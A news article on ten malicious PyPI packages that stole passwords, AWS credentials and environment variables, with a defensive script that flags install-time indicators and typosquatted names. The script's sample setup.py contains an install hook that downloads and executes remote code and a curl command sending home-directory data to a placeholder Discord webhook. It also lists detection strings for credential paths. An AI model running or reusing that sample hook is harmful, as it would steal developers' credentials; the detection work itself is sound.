10 Malicious PyPI Packages Steal Credentials

Written by Emma Davis

Another case of malware slipping into PyPI has been discovered: 10 malicious packages were removed from the repository at once, because they could steal data from developers, including passwords and API tokens.

The problem was reported by researchers at Check Point. Malicious packages have traditionally relied on typosquatting to spread, they said, meaning they were downloaded when a user misspelled the name of a genuinely popular package.

Let me remind you that we also covered "The Student Makes a Joke and Placed the Ransomware in the PyPI Repository" and "Malicious PyPI Packages Steal AWS Accounts".

"Such attacks have become more frequent and grown in impact in recent years; therefore it is essential that developers make sure they are keeping their actions safe, double-checking every software ingredient in use, especially those being downloaded from different repositories, and especially ones that were not self-created," Check Point specialists write.

In their report, the experts describe the following malicious libraries:

  1. Ascii2text: Downloads a malicious script that collects passwords stored in browsers, including Google Chrome, Microsoft Edge, Brave, Opera and Yandex Browser.
  2. Pyg-utils, Pymocks and PyProto2: Aimed at stealing AWS credentials and very similar to another malware set discovered by Sonatype in June. The first package even connects to the same domain (pygrata.com), while the other two use pymocks.com.
  3. Test-async and Zlibsrc: Download and execute malicious code from an external source during installation.
  4. Free-net-vpn, Free-net-vpn2 and WINRPCexploit: Steal user credentials and environment variables.
  5. Browserdiv: Steals credentials and other information stored in the browser's local storage folder, and exfiltrates the data via Discord webhooks.
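The behaviours in the list above (remote code fetched and executed at install time, environment variables read, browser profile folders touched, Discord webhooks used for exfiltration) leave recognisable traces in a package's setup.py. The script below is an added example written for this article, not Check Point's code and not taken from any of the packages named: it statically triages a setup.py for those indicators and checks a package name for typosquat proximity to well-known projects. The sample setup.py, the short list of popular names and the 0.8 similarity threshold are constructed assumptions for illustration; the check is a heuristic triage aid, not a substitute for reviewing or sandboxing a dependency.

```python
"""Added example: static triage of a PyPI sdist's setup.py for the
install-time indicators described in the article, plus a typosquat check.
Sample input and popular-name list are constructed for this example."""
import ast
from difflib import SequenceMatcher

# Indicator sets, derived from the behaviours the article describes.
NETWORK_MODULES = {"urllib", "requests", "http", "socket", "httpx"}
NETWORK_CALLS = {"urlopen", "urlretrieve"}
EXEC_CALLS = {"exec", "eval", "system", "Popen", "check_output", "check_call"}
ENV_NAMES = {"environ", "getenv"}
SUSPICIOUS_SUBSTRINGS = ("discord.com/api/webhooks", "Login Data",
                         "Local Storage", "AppData", ".aws/credentials")

# Constructed (hypothetical) names; a real check would use the PyPI top-N list.
POPULAR = ["requests", "urllib3", "numpy", "boto3", "colorama", "async-timeout"]


def _call_name(node: ast.Call) -> str:
    """Last component of a call target: urlopen for urllib.request.urlopen()."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def triage_setup_py(source: str) -> dict:
    """Return indicator categories mapped to sorted setup.py line numbers."""
    tree = ast.parse(source)
    hits = {"network": set(), "exec": set(), "env": set(),
            "strings": set(), "install_hook": set()}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    hits["network"].add(node.lineno)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                hits["network"].add(node.lineno)
        elif isinstance(node, ast.ClassDef):
            # Subclassing setuptools' install command runs code at pip install.
            for base in node.bases:
                if (isinstance(base, ast.Name) and base.id == "install") or \
                   (isinstance(base, ast.Attribute) and base.attr == "install"):
                    hits["install_hook"].add(node.lineno)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in NETWORK_CALLS:
                hits["network"].add(node.lineno)
            if name in EXEC_CALLS:
                hits["exec"].add(node.lineno)
            if name in ENV_NAMES:
                hits["env"].add(node.lineno)
        elif isinstance(node, ast.Attribute) and node.attr in ENV_NAMES:
            hits["env"].add(node.lineno)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(s in node.value for s in SUSPICIOUS_SUBSTRINGS):
                hits["strings"].add(node.lineno)
    findings = {k: sorted(v) for k, v in hits.items()}
    # Fetch-then-execute is the "download and execute during installation" pattern.
    findings["remote_code_pattern"] = bool(findings["network"] and findings["exec"])
    return findings


def typosquat_candidates(name: str, known=POPULAR, threshold=0.8) -> list:
    """Known names the candidate closely resembles without matching exactly."""
    n = name.lower().replace("_", "-")
    return [k for k in known
            if k != n and SequenceMatcher(None, n, k).ratio() >= threshold]


# Constructed sample: a setup.py exhibiting every behaviour from the list above.
SAMPLE_SETUP_PY = '''
import os, base64
from urllib.request import urlopen
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        payload = urlopen("https://example.invalid/stage2.py").read()
        exec(payload)
        os.system("curl -d @%s https://discord.com/api/webhooks/000/xyz" % os.environ["HOME"])

setup(name="requets", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for key, value in triage_setup_py(SAMPLE_SETUP_PY).items():
        print(f"{key:>20}: {value}")
    print("typosquat candidates for 'requets':", typosquat_candidates("requets"))
```

Run it against an unpacked sdist's setup.py (and, for wheels, any `.pth` or `__init__.py` that runs at import) before installing; a hit in `install_hook` together with `remote_code_pattern` is the exact shape of the Test-async / Zlibsrc behaviour described above, and a non-empty typosquat list is a reason to re-read the name you typed.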

Image: fake library vs. real library

The researchers do not know exactly how many times these malicious packages were downloaded, but they write that it amounts to at least hundreds of downloads.

Although the malware has now been removed from PyPI, developers who downloaded these packages may still be at risk. The researchers recommend that victims treat their machines as completely compromised and take appropriate steps to clean up the system. Since the packages targeted passwords, API tokens and environment variables, that clean-up should include rotating any credentials that were present on the affected machine.


About the author

Emma Davis

I'm a writer and content manager (a short time ago I completed a bachelor's degree in Marketing at Gustavus Adolphus College). For now, I have a deep drive to study cyber security.
